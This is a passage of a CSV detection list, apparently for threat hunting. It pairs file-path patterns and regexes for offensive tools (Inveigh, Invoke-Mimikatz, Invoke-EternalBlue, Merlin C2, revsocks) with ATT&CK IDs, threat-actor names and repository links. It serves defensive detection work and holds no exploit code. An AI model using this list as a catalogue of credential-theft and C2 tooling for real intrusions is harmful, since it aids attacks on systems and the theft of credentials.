"*\InternalMonologue.pdb*",".{0,1000}\\InternalMonologue\.pdb.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - 
T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15928" "*\InternetConnect_x64_Release.exe*",".{0,1000}\\InternetConnect_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","15929" "*\Intranet penetration.cna*",".{0,1000}\\Intranet\spenetration\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15932" "*\Inveigh.exe*",".{0,1000}\\Inveigh\.exe.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","15933" "*\Inveigh.exe*",".{0,1000}\\Inveigh\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common 
C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","15934" "*\inveigh.exe*",".{0,1000}\\inveigh\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","15935" "*\inveigh.log*",".{0,1000}\\inveigh\.log.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15936" "*\inveigh.log*",".{0,1000}\\inveigh\.log.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 
- T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15937" "*\Inveigh.ps1*",".{0,1000}\\Inveigh\.ps1.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15938" "*\Inveigh.ps1*",".{0,1000}\\Inveigh\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15939" "*\Inveigh.ps1*",".{0,1000}\\Inveigh\.ps1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15940" 
"*\Inveigh.ps1*",".{0,1000}\\Inveigh\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","15941" "*\Inveigh.psd1*",".{0,1000}\\Inveigh\.psd1.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15942" "*\Inveigh.psd1*",".{0,1000}\\Inveigh\.psd1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15943" "*\Inveigh\bin\*",".{0,1000}\\Inveigh\\bin\\.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & 
Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","15944" "*\Inveigh-Cleartext.txt*",".{0,1000}\\Inveigh\-Cleartext\.txt.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15945" "*\Inveigh-Cleartext.txt*",".{0,1000}\\Inveigh\-Cleartext\.txt.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15946" "*\Inveigh-FormInput.txt*",".{0,1000}\\Inveigh\-FormInput\.txt.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15947" "*\Inveigh-FormInput.txt*",".{0,1000}\\Inveigh\-FormInput\.txt.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15948" "*\Inveigh-Log.txt*",".{0,1000}\\Inveigh\-Log\.txt.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15949" "*\Inveigh-Log.txt*",".{0,1000}\\Inveigh\-Log\.txt.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. 
You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","15950" "*\Inveigh-Log.txt*",".{0,1000}\\Inveigh\-Log\.txt.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15951" "*\Inveigh-NTLMv1.txt*",".{0,1000}\\Inveigh\-NTLMv1\.txt.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15952" "*\Inveigh-NTLMv1.txt*",".{0,1000}\\Inveigh\-NTLMv1\.txt.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - 
T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15953" "*\Inveigh-NTLMv2.txt*",".{0,1000}\\Inveigh\-NTLMv2\.txt.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15954" "*\Inveigh-NTLMv2.txt*",".{0,1000}\\Inveigh\-NTLMv2\.txt.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15955" "*\InventoryApplicationFile\revsocks_windows*",".{0,1000}\\InventoryApplicationFile\\revsocks_windows.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","0","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","15957" "*\Invoke-ADEnum\*",".{0,1000}\\Invoke\-ADEnum\\.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory 
Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","15964" "*\Invoke-ADEnum-main*",".{0,1000}\\Invoke\-ADEnum\-main.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","15965" "*\Invoke-ADSBackdoor.ps1*",".{0,1000}\\Invoke\-ADSBackdoor\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15966" "*\Invoke-ArgFuscator-main*",".{0,1000}\\Invoke\-ArgFuscator\-main.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","15967" "*\Invoke-Bypass.ps1*",".{0,1000}\\Invoke\-Bypass\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15968" "*\Invoke-DCOM.ps1*",".{0,1000}\\Invoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","15969" "*\Invoke-DCOM.ps1*",".{0,1000}\\Invoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15970" "*\Invoke-DCOMPowerPointPivot.ps1*",".{0,1000}\\Invoke\-DCOMPowerPointPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15971" "*\Invoke-Dump.ps1*",".{0,1000}\\Invoke\-Dump\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 
- T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15972" "*\Invoke-EternalBlue.ps1*",".{0,1000}\\Invoke\-EternalBlue\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15973" "*\Invoke-ExcelMacroPivot.ps1*",".{0,1000}\\Invoke\-ExcelMacroPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15974" "*\Invoke-InternalMonologue.ps1*",".{0,1000}\\Invoke\-InternalMonologue\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - 
TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15975" "*\Invoke-MDExclusionParser.ps1*",".{0,1000}\\Invoke\-MDExclusionParser\.ps1.{0,1000}","offensive_tool_keyword","MDExclusionParser","PowerShell script to quickly scan Event Log ID 5007 and 1121 for published Windows Defender Exclusions and Attack Surface Reduction (ASR) rule configuration.","T1562.001","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/ViziosDe/MDExclusionParser","1","0","N/A","N/A","5","1","6","1","2024-06-12T14:17:08Z","2024-06-12T11:56:07Z","15977" "*\Invoke-Mimikatz.ps1*",".{0,1000}\\Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15978" "*\Invoke-mimikittenz.ps1*",".{0,1000}\\Invoke\-mimikittenz\.ps1.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","15979" "*\Invoke-MS16032.ps1*",".{0,1000}\\Invoke\-MS16032\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15980" "*\Invoke-MS16-032.ps1*",".{0,1000}\\Invoke\-MS16\-032\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","15981" "*\Invoke-MS16135.ps1*",".{0,1000}\\Invoke\-MS16135\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15982" "*\Invoke-Obfuscation*",".{0,1000}\\Invoke\-Obfuscation.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","15983" 
"*\Invoke-PowerThIEf.ps1*",".{0,1000}\\Invoke\-PowerThIEf\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15984" "*\Invoke-PsUACme.ps1*",".{0,1000}\\Invoke\-PsUACme\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","15985" "*\Invoke-Shellcode.ps1*",".{0,1000}\\Invoke\-Shellcode\.ps1.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential 